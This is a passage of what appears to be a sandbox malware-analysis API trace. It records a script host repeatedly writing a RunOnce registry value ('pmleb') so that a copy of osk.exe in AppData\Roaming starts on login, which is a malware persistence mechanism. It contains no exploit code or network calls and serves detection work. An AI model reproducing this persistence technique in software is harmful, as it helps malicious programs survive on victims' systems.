FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0080.067] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.067] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.067] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.067] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.067] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.067] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.067] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.067] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.067] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.068] RegCloseKey (hKey=0x280) returned 0x0 [0080.068] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.068] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.068] SetTimer (hWnd=0x20280, nIDEvent=0x2063, uElapse=0xa, lpTimerFunc=0x0) returned 0x2063 [0080.068] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.080] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.080] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.080] KillTimer (hWnd=0x20280, uIDEvent=0x2063) returned 1 [0080.080] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.081] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.081] IUnknown:Release (This=0x787518) returned 0x1 [0080.081] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.081] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.081] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.081] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.081] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0080.081] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.081] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x65 [0080.082] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.082] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0080.082] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.082] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.082] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.082] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.082] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.083] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.083] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.083] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.083] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.083] RegCloseKey (hKey=0x280) returned 0x0 [0080.083] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.083] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.083] SetTimer (hWnd=0x20280, nIDEvent=0x2064, uElapse=0xa, lpTimerFunc=0x0) returned 0x2064 [0080.083] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.096] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.096] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.096] KillTimer (hWnd=0x20280, uIDEvent=0x2064) returned 1 [0080.096] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.096] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.096] IUnknown:Release (This=0x787518) returned 0x1 [0080.097] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.097] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.097] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.097] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.097] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0080.097] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.097] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x66 [0080.097] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.098] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0080.098] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.098] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.099] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.099] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.099] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.099] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.099] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.099] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.099] RegCloseKey (hKey=0x280) returned 0x0 [0080.099] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.099] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.099] SetTimer (hWnd=0x20280, nIDEvent=0x2065, uElapse=0xa, lpTimerFunc=0x0) returned 0x2065 [0080.099] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.123] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.123] KillTimer (hWnd=0x20280, uIDEvent=0x2065) returned 1 [0080.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.124] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.124] IUnknown:Release (This=0x787518) returned 0x1 [0080.124] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.124] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.124] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.125] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.125] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0080.125] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.125] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x67 [0080.125] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, 